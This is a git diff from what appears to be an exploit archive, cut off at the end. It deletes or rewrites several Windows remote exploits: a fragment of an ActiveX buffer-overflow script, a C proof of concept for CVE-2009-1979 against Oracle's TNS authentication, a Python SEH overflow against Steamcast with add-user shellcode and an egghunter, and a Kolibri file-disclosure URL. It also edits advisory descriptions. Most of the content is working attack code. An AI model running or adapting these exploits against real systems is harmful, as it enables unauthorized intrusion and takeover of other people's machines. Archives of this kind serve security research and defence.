unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a") -jnk = string(537,"A") -eip = unescape("%67%41%41%7e") '0x7E414167 call esp user32.dll -nop = string(16,unescape("%90")) -mapID=1 -pstrChmFile= jnk + eip + nop + scode -pstrFrame="aaaaaaaa" -'KEYHELPLib.JumpMappedID mapID,pstrChmFile,pstrFrame -KEYHELPLib.JumpURL mapID,pstrChmFile,pstrFrame -</script> diff --git a/platforms/windows/remote/10080.txt b/platforms/windows/remote/10080.txt deleted file mode 100755 index c211e7b10..000000000 --- a/platforms/windows/remote/10080.txt +++ /dev/null @@ -1,386 +0,0 @@ -#include <winsock2.h> -#include <stdio.h> -#include <string.h> -#include <windows.h> -#include <assert.h> - -#include <string> - -void s_send (SOCKET s, char *msg, DWORD size) -{ - int sent; - - printf ("s_send: begin: %d bytes\n", size); - - sent=send (s, (char*)msg, size, 0); - - if (sent==SOCKET_ERROR) - { - printf ("send() -> SOCKET_ERROR, WSAGetLastError=%d\n", WSAGetLastError()); - } else - - if (sent!=size) - printf ("sent only %d bytes\n", sent); - - printf ("s_send: end\n"); -}; - -void s_recv (SOCKET s) -{ - char buf[20000]; - int r; - - struct timeval t; - fd_set fd; - - t.tv_sec=0; - t.tv_usec=100000; // 100 ms - - printf ("s_recv: begin\n"); - - FD_ZERO(&fd); - FD_SET(s, &fd); - - if (select (0, &fd, 0, 0, &t)) - // if (select (0, &fd, 0, 0, NULL)) - { - r=recv (s, buf, 20000, 0); - if (r!=0 && r!=-1) - { - printf ("got %d bytes\n", r); - } - else - { - printf ("connection lost, r=%d\n", r); - }; - } - else - { - printf ("select() returns zero\n"); - }; -}; - -unsigned char NSPTCN[]= - { - 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, - 0x01, 0x3A, 0x01, 0x2C, 0x00, 0x41, 0x20, 0x00, - 0x7F, 0xFF, 0xC6, 0x0E, 0x00, 0x00, 0x01, 0x00, - 0x00, 0x00, 0x00, 0x3A, 0x00, 0x00, 0x02, 0x00, - //^^ ^^ cmd len - 0x61, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00 - - }; - -#define NSPTCN_HEADER_LEN 58 - -unsigned char NSPTDA[]= - { - 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, - // ^^ ^^ packet len - 0x00, 0x00 - }; - -#define NSPTDA_HEADER_LEN 10 - -void s_send_NSPTDA (SOCKET s, char *msg, int size) -{ - char * buf; - int sz=size + NSPTDA_HEADER_LEN; - - buf=(char*)malloc (sz); - - NSPTDA[0]=( sz ) >> 8; - NSPTDA[1]=( sz ) & 0xFF; - - memcpy (buf, NSPTDA, NSPTDA_HEADER_LEN); - memcpy (buf + NSPTDA_HEADER_LEN, msg, size); - - printf ("s_send_NSPTDA: sending %d bytes...\n", sz); - - s_send (s, (char*)buf, sz); - - free (buf); -}; - -void s_send_TNS_command (SOCKET s, const char *cmd) -{ - unsigned char * pkt; - int cmd_len=strlen (cmd); - - printf ("sending [%s]\n", cmd); - printf ("len: %d\n", cmd_len); - - if (cmd_len<231) - { - - int str_len=strlen(cmd); - int pkt_len=str_len+58; - - pkt=(unsigned char*)malloc (str_len+58); - - memcpy (pkt, - "\x00\x00\x00\x00\x01\x00\x00\x00" - // plenH, plenL - "\x01\x3A\x01\x2C\x00\x41\x20\x00" - "\x7F\xFF\xC6\x0E\x00\x00\x01\x00" - "\x00\x00\x00\x3A\x00\x00\x02\x00" - // cmdlenH cmdlenL - "\x61\x61\x00\x00\x00\x00\x00\x00" - "\x00\x00\x00\x00\x00\x00\x00\x00" - "\x00\x00\x00\x00\x00\x00\x00\x00" - "\x00\x00", 58); - - memcpy (pkt+58, cmd, str_len); - - pkt[1]=pkt_len&0xFF; - pkt[0]=(pkt_len>>8)&0xFF; - - pkt[25]=str_len&0xFF; - pkt[24]=(str_len>>8)&0xFF; - - s_send (s, (char*)pkt, pkt_len); - - free (pkt); - - } - else - { - // something should be modified here in NSPTCN - assert (0); - }; -}; - -bool try_host (char * h) -{ - struct hostent *hp; - WSADATA wsaData; - struct sockaddr_in sin; - int r; - struct timeval t; - fd_set fd; - SOCKET s; - char pkt1318[1318]; - - WSAStartup(MAKEWORD(1, 1), &wsaData); - - hp=gethostbyname (h); - assert (hp!=NULL); - - s=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); - - assert (s!=INVALID_SOCKET); - - { - u_long on=1; - assert (ioctlsocket(s, FIONBIO, &on) != -1); - }; - - sin.sin_family=AF_INET; - sin.sin_port=htons(1521); - memcpy(&sin.sin_addr, hp->h_addr, hp->h_length); - - r=connect(s, (struct sockaddr *)&sin, sizeof(sin)); - - t.tv_sec=3; - t.tv_usec=0; - - FD_ZERO(&fd); - FD_SET(s, &fd); - - if (select (0, 0, &fd, 0, &t)) - { - printf ("connected to %s\n", h); - - s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))"); - - // waiting for NSPTRS - - s_recv(s); - - s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))"); - - // waiting for NSPTAC - - s_recv(s); - - // send NA packet - - s_send (s, - "\x00\x9C\x00\x00\x06\x00\x00\x00\x00\x00\xDE\xAD\xBE\xEF\x00\x92" - "\x0B\x10\x06\x00\x00\x04\x00\x00\x04\x00\x03\x00\x00\x00\x00\x00" - "\x04\x00\x05\x0B\x10\x06\x00\x00\x08\x00\x01\x00\x00\x0A\xF8\x71" - "\xC2\x6C\xE1\x00\x12\x00\x01\xDE\xAD\xBE\xEF\x00\x03\x00\x00\x00" - "\x04\x00\x04\x00\x01\x00\x01\x00\x02\x00\x01\x00\x03\x00\x00\x00" - "\x00\x00\x04\x00\x05\x0B\x10\x06\x00\x00\x02\x00\x03\xE0\xE1\x00" - "\x02\x00\x06\xFC\xFF\x00\x02\x00\x02\x00\x00\x00\x00\x00\x04\x00" - "\x05\x0B\x10\x06\x00\x00\x0C\x00\x01\x00\x11\x06\x10\x0C\x0F\x0A" - "\x0B\x08\x02\x01\x03\x00\x03\x00\x02\x00\x00\x00\x00\x00\x04\x00" - "\x05\x0B\x10\x06\x00\x00\x03\x00\x01\x00\x03\x01" - ,156); - - s_recv (s); - - // send TTIPRO - - s_send (s, - - "\x00\x25\x00\x00\x06\x00\x00\x00\x00\x00\x01\x06\x05\x04\x03\x02" - "\x01\x00\x49\x42\x4D\x50\x43\x2F\x57\x49\x4E\x5F\x4E\x54\x2D\x38" - "\x2E\x31\x2E\x30\x00" - , 37); - - s_recv (s); - - // send TTIDTY - - s_send (s, - - "\x00\x4B\x00\x00\x06\x00\x00\x00\x00\x00\x02\xB2\x00\xB2\x00\xD2" - "\x25\x06\x01\x01\x01\x0D\x01\x01\x05\x01\x01\x01\x01\x01\x01\x01" - "\x7F\xFF\x03\x09\x03\x03\x01\x00\x7F\x01\x1F\xFF\x01\x03\x01\x01" - "\x3F\x01\x01\x05\x00\x01\x07\x02\x01\x00\x00\x18\x00\x01\x80\x00" - "\x00\x00\x3C\x3C\x3C\x80\x00\x00\x00\xD0\x07" - , 75); - - s_recv (s); - - - // call OSESSKEY - - s_send (s, - - "\x00\xDA\x00\x00\x06\x00\x00\x00\x00\x00\x03\x76\x02\xFE\xFF\xFF" - "\xFF\x05\x00\x00\x00\x01\x00\x00\x00\xFE\xFF\xFF\xFF\x05\x00\x00" - "\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0D" - "\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41" - "\x4C\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F" - "\x00\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D" - "\x5F\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65" - "\x78\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F" - "\x4D\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B" - "\x47\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08" - "\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00" - "\x09\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00" - "\x00\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06" - "\x64\x65\x6E\x6E\x69\x73\x00\x00\x00\x00" - , 218); - - // call OAUTH - - memcpy (pkt1318, - "\x05\x26\x00\x00\x06\x00\x00\x00\x00\x00\x03\x73\x03\xFE\xFF\xFF" - "\xFF\x05\x00\x00\x00\x01\x01\x00\x00\xFE\xFF\xFF\xFF\x12\x00\x00" - "\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0C" - "\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x53\x45\x53\x53\x4B\x45\x59" - "\x40\x00\x00\x00\x40\x36\x33\x41\x45\x31\x36\x41\x30\x44\x31\x41" - "\x46\x31\x45\x39\x33\x37\x41\x44\x36\x36\x46\x34\x46\x31\x35\x36" - "\x37\x31\x30\x33\x30\x34\x46\x36\x36\x30\x31\x44\x30\x45\x33\x35" - "\x34\x37\x46\x42\x46\x39\x35\x34\x39\x37\x34\x32\x33\x30\x42\x43" - "\x30\x36\x45\x34\x30\x01\x00\x00\x00\x0D\x00\x00\x00\x0D\x41\x55" - "\x54\x48\x5F\x50\x41\x53\x53\x57\x4F\x52\x44\x40\x00\x00\x00\x40" - "\x36\x31\x37\x35\x31\x42\x45\x35\x34\x37\x31\x30\x44\x45\x41\x46" - "\x38\x46\x42\x33\x34\x32\x45\x36\x32\x41\x45\x35\x30\x45\x44\x38" - "\x45\x43\x38\x30\x39\x33\x31\x44\x33\x44\x45\x34\x42\x33\x41\x37" - "\x34\x35\x38\x37\x45\x36\x46\x32\x36\x46\x37\x45\x45\x30\x34\x34" - "\x00\x00\x00\x00\x08\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x52\x54" - "\x54\x05\x00\x00\x00\x05\x32\x38\x30\x32\x38\x00\x00\x00\x00\x0D" - "\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x43\x4C\x4E\x54\x5F\x4D\x45" - "\x4D\x04\x00\x00\x00\x04\x34\x30\x39\x36\x00\x00\x00\x00\x0D\x00" - "\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41\x4C" - "\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F\x00" - "\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D\x5F" - "\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65\x78" - "\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x4D" - "\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B\x47" - "\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08\x00" - "\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00\x09" - "\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00\x00" - "\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06\x64" - "\x65\x6E\x6E\x69\x73\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45" - "\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x43\x48\x41" - "\x52\x53\x45\x54\x03\x00\x00\x00\x03\x31\x37\x38\x00\x00\x00\x00" - "\x17\x00\x00\x00\x17\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49" - "\x45\x4E\x54\x5F\x4C\x49\x42\x5F\x54\x59\x50\x45\x01\x00\x00\x00" - "\x01\x31\x00\x00\x00\x00\x1A\x00\x00\x00\x1A\x53\x45\x53\x53\x49" - "\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x44\x52\x49\x56\x45\x52" - "\x5F\x4E\x41\x4D\x45\x0E\x00\x00\x00\x0E\x63\x78\x5F\x4F\x72\x61" - "\x63\x6C\x65\x2D\x34\x2E\x34\x20\x00\x00\x00\x00\x16\x00\x00\x00" - "\x16\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F" - "\x56\x45\x52\x53\x49\x4F\x4E\x09\x00\x00\x00\x09\x31\x38\x35\x35" - "\x39\x39\x34\x38\x38\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45" - "\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x4C\x4F\x42" - "\x41\x54\x54\x52\x01\x00\x00\x00\x01\x31\x00\x00\x00\x00\x08\x00" - "\x00\x00\x08\x41\x55\x54\x48\x5F\x41\x43\x4C\x04\x00\x00\x00\x04" - "\x34\x34\x30\x30\x00\x00\x00\x00\x12\x00\x00\x00\x12\x41\x55\x54" - "\x48\x5F\x41\x4C\x54\x45\x52\x5F\x53\x45\x53\x53\x49\x4F\x4E\xE9" - "\x01\x00\x00\xFE\xFF\x41\x4C\x54\x45\x52\x20\x53\x45\x53\x53\x49" - "\x4F\x4E\x20\x53\x45\x54\x20\x4E\x4C\x53\x5F\x4C\x41\x4E\x47\x55" - "\x41\x47\x45\x3D\x20\x27\x41\x4D\x45\x52\x49\x43\x41\x4E\x27\x20" - "\x4E\x4C\x53\x5F\x54\x45\x52\x52\x49\x54\x4F\x52\x59\x3D\x20\x27" - "\x41\x4D\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x43\x55\x52" - "\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x49" - "\x53\x4F\x5F\x43\x55\x52\x52\x45\x4E\x43\x59\x3D\x20\x27\x41\x4D" - "\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x4E\x55\x4D\x45\x52" - "\x49\x43\x5F\x43\x48\x41\x52\x41\x43\x54\x45\x52\x53\x3D\x20\x27" - "\x2E\x2C\x27\x20\x4E\x4C\x53\x5F\x43\x41\x4C\x45\x4E\x44\x41\x52" - "\x3D\x20\x27\x47\x52\x45\x47\x4F\x52\x49\x41\x4E\x27\x20\x4E\x4C" - "\x53\x5F\x44\x41\x54\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27" - "\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x27\x20\x4E\x4C\x53\x5F\x44" - "\x41\x54\x45\x5F\x4C\x41\x4E\x47\x55\x41\x47\x45\x3D\x20\x27\x41" - "\x4D\x45\x52\x49\x43\x41\x4E\x27\x20\x4E\x4C\x53\x5F\x53\x4F\x52" - "\x54\x3D\x20\x27\x42\x49\x4E\x41\x52\x59\x27\x20\x54\x49\x4D\x45" - "\x5F\x5A\x4F\x4E\xEA\x45\x3D\x20\x27\x2B\x30\x33\x3A\x30\x30\x27" - "\x20\x4E\x4C\x53\x5F\x43\x4F\x4D\x50\x3D\x20\x27\x42\x49\x4E\x41" - "\x52\x59\x27\x20\x4E\x4C\x53\x5F\x44\x55\x41\x4C\x5F\x43\x55\x52" - "\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x54" - "\x49\x4D\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27\x48\x48\x2E" - "\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C\x53" - "\x5F\x54\x49\x4D\x45\x53\x54\x41\x4D\x50\x5F\x46\x4F\x52\x4D\x41" - "\x54\x3D\x20\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48" - "\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C" - "\x53\x5F\x54\x49\x4D\x45\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54" - "\x3D\x20\x27\x48\x48\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41" - "\x4D\x20\x54\x5A\x52\x27\x20\x4E\x4C\x53\x5F\x54\x49\x4D\x45\x53" - "\x54\x41\x4D\x50\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20" - "\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48\x2E\x4D\x49" - "\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x20\x54\x5A\x52\x27\x00\x00" - "\x00\x00\x00\x00\x17\x00\x00\x00\x17\x41\x55\x54\x48\x5F\x4C\x4F" - "\x47\x49\x43\x41\x4C\x5F\x53\x45\x53\x53\x49\x4F\x4E\x5F\x49\x44" - "\x20\x00\x00\x00\x20\x35\x44\x46\x34\x37\x43\x45\x35\x42\x38\x42" - "\x32\x34\x43\x46\x38\x42\x46\x42\x36\x46\x30\x46\x36\x39\x32\x42" - "\x38\x46\x42\x39\x38\x00\x00\x00\x00\x10\x00\x00\x00\x10\x41\x55" - "\x54\x48\x5F\x46\x41\x49\x4C\x4F\x56\x45\x52\x5F\x49\x44\x00\x00" - "\x00\x00\x00\x00\x00\x00" - ,1318); - - pkt1318[0x41]=0x80; - - s_send (s, pkt1318, 1318); - - assert (closesocket (s)==0); - return true; - } - else - { - printf ("while connect(): select() returns zero\n"); - assert (closesocket (s)==0); - return false; - }; -}; - -void main(int argc, char * argv[]) -{ - - printf ("CVE-2009-1979 PoC. Working at least on 10.2.0.4 win32\n"); - printf ("Vulnerability discovered by Dennis Yurichev <dennis@conus.info> http://blogs.conus.info\n"); - if (argv[1]==NULL) - { - printf ("use: %s <hostname>\n", argv[0]); - return; - }; - - try_host (argv[1]); -}; \ No newline at end of file diff --git a/platforms/windows/remote/20324.txt b/platforms/windows/remote/20324.txt index 999b61596..b1e0bed5d 100755 --- a/platforms/windows/remote/20324.txt +++ b/platforms/windows/remote/20324.txt @@ -1,7 +1,7 @@ source: http://www.securityfocus.com/bid/1839/info -Acquiring access to known files outside of the web root is possible through directory traversal techniques in both iPlanet Certificate Management System (CMS) and Netscape Directory Server. This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability: +Acquiring access to known files outside of the web root is possible through directory traversal techniques in both iPlanet Certificate Management System (CMS). This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability: - The Agent services server on port 8100/tcp - The End Entity services server on port 443/tcp (Accessible through SSL) diff --git a/platforms/windows/remote/20325.txt b/platforms/windows/remote/20325.txt index a0bb52285..83f8909cf 100755 --- a/platforms/windows/remote/20325.txt +++ b/platforms/windows/remote/20325.txt @@ -1,7 +1,7 @@ source: http://www.securityfocus.com/bid/1839/info -Acquiring access to known files outside of the web root is possible through directory traversal techniques in both iPlanet Certificate Management System (CMS) and Netscape Directory Server. This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability: +Acquiring access to known files outside of the web root is possible through directory traversal techniques in Netscape Directory Server. This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability: - The Agent services server on port 8100/tcp - The End Entity services server on port 443/tcp (Accessible through SSL) diff --git a/platforms/windows/remote/32517.html b/platforms/windows/remote/32517.html index c43bc5022..f4da9c098 100755 --- a/platforms/windows/remote/32517.html +++ b/platforms/windows/remote/32517.html @@ -1,6 +1,6 @@ source: http://www.securityfocus.com/bid/31855/info -Multiple vendors' web browsers are prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol. +Mozilla Firefox 3 is prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol. Successfully exploiting this issue may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of an FTP session. This may allow the attacker to perform malicious actions in a user's browser or redirect the user to a malicious site; other attacks are also possible. diff --git a/platforms/windows/remote/32518.txt b/platforms/windows/remote/32518.html similarity index 69% rename from platforms/windows/remote/32518.txt rename to platforms/windows/remote/32518.html index 17b38cba1..b3da90d9d 100755 --- a/platforms/windows/remote/32518.txt +++ b/platforms/windows/remote/32518.html @@ -1,6 +1,6 @@ source: http://www.securityfocus.com/bid/31855/info -Multiple vendors' web browsers are prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol. +Google Chrome 0.2.149 is prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol. Successfully exploiting this issue may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of an FTP session. This may allow the attacker to perform malicious actions in a user's browser or redirect the user to a malicious site; other attacks are also possible. diff --git a/platforms/windows/remote/8422.py b/platforms/windows/remote/8422.py index b8680ce62..e18654b84 100755 --- a/platforms/windows/remote/8422.py +++ b/platforms/windows/remote/8422.py @@ -1,59 +1,59 @@ -#!/usr/bin/python -#[*] Usage : steamcast.py [victime_ip] -#[*] Bug : Steamcast(HTTP Request) Remote Buffer Overflow Exploit (SEH) [2] -#[*] Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln. -#[*] Tested on : Xp sp2 (fr) -#[*] Exploited by : His0k4 -#[*] Greetings : All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com -#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D -#[*] Translate by Cyb3r-1st : esse7 embe7 embou :p - -#Short Description : The previous exploit runs small shellcodes only, this one is the opposite :) -#Note : The problem is that we need to find a dll wich its not compiled with GS, in my case i founded idmmbc its a loaded dll of internet download manager so try to find an unsafe dll. -#Other note : The shellcode will be executed when the program will be closed. -#Another one : When you have problems with running the exploit msg me before you msg str0ke. - -import sys, socket -import struct - -host = sys.argv[1] -port = 8000 - - -# win32_adduser - PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com -shellcode=( -"\x44\x7A\x32\x37\x44\x7A\x32\x37\x29\xc9\x83\xe9\xcd\xd9\xee\xd9" -"\x74\x24\xf4\x5b\x81\x73\x13\x05\x16\xf2\x06\x83\xeb\xfc\xe2\xf4" -"\xf9\xfe\xb6\x06\x05\x16\x79\x43\x39\x9d\x8e\x03\x7d\x17\x1d\x8d" -"\x4a\x0e\x79\x59\x25\x17\x19\x4f\x8e\x22\x79\x07\xeb\x27\x32\x9f" -"\xa9\x92\x32\x72\x02\xd7\x38\x0b\x04\xd4\x19\xf2\x3e\x42\xd6\x02" -"\x70\xf3\x79\x59\x21\x17\x19\x60\x8e\x1a\xb9\x8d\x5a\x0a\xf3\xed" -"\x8e\x0a\x79\x07\xee\x9f\xae\x22\x01\xd5\xc3\xc6\x61\x9d\xb2\x36" -"\x80\xd6\x8a\x0a\x8e\x56\xfe\x8d\x75\x0a\x5f\x8d\x6d\x1e\x19\x0f" -"\x8e\x96\x42\x06\x05\x16\x79\x6e\x39\x49\xc3\xf0\x65\x40\x7b\xfe" -"\x86\xd6\x89\x56\x6d\xe6\x78\x02\x5a\x7e\x6a\xf8\x8f\x18\xa5\xf9" -"\xe2\x75\x9f\x62\x2b\x73\x8a\x63\x25\x39\x91\x26\x6b\x73\x86\x26" -"\x70\x65\x97\x74\x25\x72\x88\x26\x37\x21\xd2\x29\x44\x52\xb6\x26" -"\x23\x30\xd2\x68\x60\x62\xd2\x6a\x6a\x75\x93\x6a\x62\x64\x9d\x73" -"\x75\x36\xb3\x62\x68\x7f\x9c\x6f\x76\x62\x80\x67\x71\x79\x80\x75" -"\x25\x72\x88\x26\x2a\x57\xb6\x42\x05\x16\xf2\x06") - -shellunt=( -"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" -"\xef\xb8\x44\x7A\x32\x37\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") - - -exploit = "\x90"*(1003-len(shellcode)) + shellcode + "\xEB\x06\x90\x90" + "\xDB\x27\x02\x10" + "\x90"*20 + shellunt - -#It needs a loop to works -while 1: - s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.connect((host, port)) - head = "GET / HTTP/1.1\r\n" - head += "Host: "+host+"\r\n" - head += exploit+"\r\n" - head += "\r\n\r\n" - - s.send(head) - -# milw0rm.com [2009-04-13] +#!/usr/bin/python +#[*] Usage : steamcast.py [victime_ip] +#[*] Bug : Steamcast(HTTP Request) Remote Buffer Overflow Exploit (SEH) [2] +#[*] Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln. +#[*] Tested on : Xp sp2 (fr) +#[*] Exploited by : His0k4 +#[*] Greetings : All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com +#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D +#[*] Translate by Cyb3r-1st : esse7 embe7 embou :p + +#Short Description : The previous exploit runs small shellcodes only, this one is the opposite :) +#Note : The problem is that we need to find a dll wich its not compiled with GS, in my case i founded idmmbc its a loaded dll of internet download manager so try to find an unsafe dll. +#Other note : The shellcode will be executed when the program will be closed. +#Another one : When you have problems with running the exploit msg me before you msg str0ke. + +import sys, socket +import struct + +host = sys.argv[1] +port = 8000 + + +# win32_adduser - PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com +shellcode=( +"\x44\x7A\x32\x37\x44\x7A\x32\x37\x29\xc9\x83\xe9\xcd\xd9\xee\xd9" +"\x74\x24\xf4\x5b\x81\x73\x13\x05\x16\xf2\x06\x83\xeb\xfc\xe2\xf4" +"\xf9\xfe\xb6\x06\x05\x16\x79\x43\x39\x9d\x8e\x03\x7d\x17\x1d\x8d" +"\x4a\x0e\x79\x59\x25\x17\x19\x4f\x8e\x22\x79\x07\xeb\x27\x32\x9f" +"\xa9\x92\x32\x72\x02\xd7\x38\x0b\x04\xd4\x19\xf2\x3e\x42\xd6\x02" +"\x70\xf3\x79\x59\x21\x17\x19\x60\x8e\x1a\xb9\x8d\x5a\x0a\xf3\xed" +"\x8e\x0a\x79\x07\xee\x9f\xae\x22\x01\xd5\xc3\xc6\x61\x9d\xb2\x36" +"\x80\xd6\x8a\x0a\x8e\x56\xfe\x8d\x75\x0a\x5f\x8d\x6d\x1e\x19\x0f" +"\x8e\x96\x42\x06\x05\x16\x79\x6e\x39\x49\xc3\xf0\x65\x40\x7b\xfe" +"\x86\xd6\x89\x56\x6d\xe6\x78\x02\x5a\x7e\x6a\xf8\x8f\x18\xa5\xf9" +"\xe2\x75\x9f\x62\x2b\x73\x8a\x63\x25\x39\x91\x26\x6b\x73\x86\x26" +"\x70\x65\x97\x74\x25\x72\x88\x26\x37\x21\xd2\x29\x44\x52\xb6\x26" +"\x23\x30\xd2\x68\x60\x62\xd2\x6a\x6a\x75\x93\x6a\x62\x64\x9d\x73" +"\x75\x36\xb3\x62\x68\x7f\x9c\x6f\x76\x62\x80\x67\x71\x79\x80\x75" +"\x25\x72\x88\x26\x2a\x57\xb6\x42\x05\x16\xf2\x06") + +shellunt=( +"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +"\xef\xb8\x44\x7A\x32\x37\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") + + +exploit = "\x90"*(1003-len(shellcode)) + shellcode + "\xEB\x06\x90\x90" + "\xDB\x27\x02\x10" + "\x90"*20 + shellunt + +#It needs a loop to works +while 1: + s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + head = "GET / HTTP/1.1\r\n" + head += "Host: "+host+"\r\n" + head += exploit+"\r\n" + head += "\r\n\r\n" + + s.send(head) + +# milw0rm.com [2009-04-13] diff --git a/platforms/windows/remote/9638.txt b/platforms/windows/remote/9638.txt index 767436e22..4e5bd634a 100755 --- a/platforms/windows/remote/9638.txt +++ b/platforms/windows/remote/9638.txt @@ -1,21 +1,21 @@ -############################################################################################# -# -# Name : Kolibri+ Webserver 2 , Remote file disclousure exploit -# Author : Skull-HacKeR -# -############################################################################################# - - -[*] Download Page : -http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol - - -[*] Attack type : Remote - -[*] Exploitation - -Exploit: -http://127.0.0.1/default.asp. -http://127.0.0.1/default.php. - -# milw0rm.com [2009-09-11] +############################################################################################# +# +# Name : Kolibri+ Webserver 2 , Remote file disclousure exploit +# Author : Skull-HacKeR +# +############################################################################################# + + +[*] Download Page : +http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol + + +[*] Attack type : Remote + +[*] Exploitation + +Exploit: +http://127.0.0.1/default.asp. +http://127.0.0.1/default.php. + +# milw0rm.com [2009-09-11] diff --git a/platforms/windows/remote/9644.py b/platforms/windows/remote/9644.py index bd4cbdfb9..dcbc8c854 100755 --- a/platforms/windows/remote/9644.py +++ b/platforms/windows/remote/9644.py @@ -1,85 +1,85 @@ -#!/usr/bin/python -# -# Could 